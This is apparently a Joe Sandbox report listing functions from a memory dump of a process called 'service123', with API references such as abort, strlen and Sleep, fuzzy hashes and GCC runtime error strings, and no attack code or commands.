Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a3bb2922cbff1bcc2dc2c47ec22b3c079148a397e341d809401b59d5256999
Instruction ID: 7ce7e3f070daf9ba9d3a1390633ab6c1ada96304b0ee9cc3555c5ffcad6205f4
Opcode Fuzzy Hash: d2a3bb2922cbff1bcc2dc2c47ec22b3c079148a397e341d809401b59d5256999
Instruction Fuzzy Hash: DCB1C47560C38A8FD710DF18C480B5ABBE1BF8A318F04496DEE949BB42C375E944CB92

Function 6C21C470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 529cabc58da4f9d777810b0b9df334445e5a202b17adbabeecf1a90e1e03160f
Instruction ID: 3c5a831c61f3f3e9d3e667773f3ee7fbb676a792ec380dabbc9172487cb159fc
Opcode Fuzzy Hash: 529cabc58da4f9d777810b0b9df334445e5a202b17adbabeecf1a90e1e03160f
Instruction Fuzzy Hash: 7E41CEB5A152189FCB00DF68C4817E9BBF5BF49358F18847AEE54EFB82D33594118B10

Function 6C21D370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C21CD00: strlen.MSVCRT ref: 6C21CD7D

Sleep.KERNEL32 ref: 6C21D4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: 866365a4526b68eb5a22803391eb203d3978505cd0b776fd639fa1ae6258a6c8
Instruction ID: b2eab6bcdecb399853ea5ae3239155e3406534ba310e27f64a2fe07c9aff8ce6
Opcode Fuzzy Hash: 866365a4526b68eb5a22803391eb203d3978505cd0b776fd639fa1ae6258a6c8
Instruction Fuzzy Hash: 9D51FEA020C3C5CAEF22CB39C2497857FF85797308F084599DB8C5B692D3BE5448C766

Function 6C21D570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 0c9104949089cc59a0b2937225b43ce11aec4389a0313c7d856e971c925f004e
Instruction ID: c7fc50a3a74ee3976533cc2b7475b8aa59950e810b267705c1f360f839b223fc
Opcode Fuzzy Hash: 0c9104949089cc59a0b2937225b43ce11aec4389a0313c7d856e971c925f004e
Instruction Fuzzy Hash: B931A17060D34ADFE3119E69E88076AB7E0AB89319F54892EEE9C97F01D334D444CB81

Function 6C21D67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: 083209fd4e689aae80f7e49047c85ed70da5e1e6a1df11e8c4434021c11248d6
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: BDB01210CEE32CC342003BA404864B5F2745B073447407C004F0A33D11CB34F4548844

Function 6C21D6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 5d73e60e3db4f09de294ef55ad09e4bc475aba4bed2bc7fa3f92902ad4d4dc31
Instruction ID: 618890e12ac0425d42093e545c79bd391811df11d27918c8bbfe3b54f512075e
Opcode Fuzzy Hash: 5d73e60e3db4f09de294ef55ad09e4bc475aba4bed2bc7fa3f92902ad4d4dc31
Instruction Fuzzy Hash: 534137B4A0D34A8FD310DF19C58075ABBE0EB89718F108D2EEA98C7B51D375D8458B92

Function 6C21D855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8a4d0521c993ca9f4bf4f508834096adfc2472188a319bba25a962f18b058c8e
Instruction ID: 5877bdd53cbef24c8f66a731fcb8f0244907263c2ae4ba96e97035122f87f28c
Opcode Fuzzy Hash: 8a4d0521c993ca9f4bf4f508834096adfc2472188a319bba25a962f18b058c8e
Instruction Fuzzy Hash: 04E0A07090824F8BD300EE2880813257BE06B8330CF941858DE4527942C338A44BCB41

Function 6C22C330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C22C3A1
fwrite.MSVCRT ref: 6C22C448
fputs.MSVCRT ref: 6C22C465
fwrite.MSVCRT ref: 6C22C48E
fputs.MSVCRT ref: 6C22C4AD
fwrite.MSVCRT ref: 6C22C4DC
fwrite.MSVCRT ref: 6C22C50E
abort.MSVCRT ref: 6C22C513
abort.MSVCRT ref: 6C2E6157
free.MSVCRT ref: 6C2E615F

Part of subcall function 6C21A340: strlen.MSVCRT ref: 6C21A3C5
Part of subcall function 6C21A340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C22C41C), ref: 6C21A3E0
Part of subcall function 6C21A340: free.MSVCRT ref: 6C21A3EA

Strings

not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C22C349
terminate called without an active exception, xrefs: 6C22C4D5
-, xrefs: 6C22C4C1
terminate called after throwing an instance of ', xrefs: 6C22C441

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 83721074d49a583d33bb6097089d1241a8577d288950356d7f0ce58ad722fdf9
Instruction ID: bd1fff962272d923c218d1539df33bdb3585a7e61acd18564fda96ce819b3e1d
Opcode Fuzzy Hash: 83721074d49a583d33bb6097089d1241a8577d288950356d7f0ce58ad722fdf9
Instruction Fuzzy Hash: 28513AB08083199FD700AF69C48979EBBF4BF85318F00891DEC959B791D7789489CF52

Function 6C21D8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7c1acf14cb5f29a4e84b775af2290742e7adef71a36708299d951e7d5f975981
Instruction ID: d79bb46d689ebbde651f3f91118fab2100e81cea2755b962e08c498796dd4076
Opcode Fuzzy Hash: 7c1acf14cb5f29a4e84b775af2290742e7adef71a36708299d951e7d5f975981
Instruction Fuzzy Hash: E4F0AEB096934E4FD311DF18C4817657BE07B43315F880C44ED446BB52C3399499CB91

Function 6C21DE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C21DEB8

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 91ce518cfe9ded1bd770b9517f2e536b55ea27b2e1aa3c531c47ab538e14821f
Instruction ID: 0b0b168e2fb4e14657aa5d742a111c34891c01b188dd4ba9665cb35293f17a12
Opcode Fuzzy Hash: 91ce518cfe9ded1bd770b9517f2e536b55ea27b2e1aa3c531c47ab538e14821f
Instruction Fuzzy Hash: 2621967450965ECADB11DF54CC84BD9B7F4AB4631AF1045A6DE08ABE10D7349E88CF80

Function 6C21DA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: f651527b8df1bd2ec03b0676d8f4e9d934e2b423de5c2d9c57d67e323bd6a804
Instruction ID: 670603c217f544913d1cd186732a7fa52e4e5ca09ca19f2ce52bd8a67a6840de
Opcode Fuzzy Hash: f651527b8df1bd2ec03b0676d8f4e9d934e2b423de5c2d9c57d67e323bd6a804
Instruction Fuzzy Hash: 0B410B75A0421D9BCB11DF54C880BDDB7F1AB89318F1485A9DD4AA7B11D734AF84CF90

Function 6C21DCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 63de22d1dd34873df10ebcfc6390a8cf73a9226a2ec1ee92b76ddf33369e10f2
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 1A115B7590422CDBCB15EF64C8809DEB7B5AF86318F04C968ED0967B10DB30AE49CBD0

Function 6C21DD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
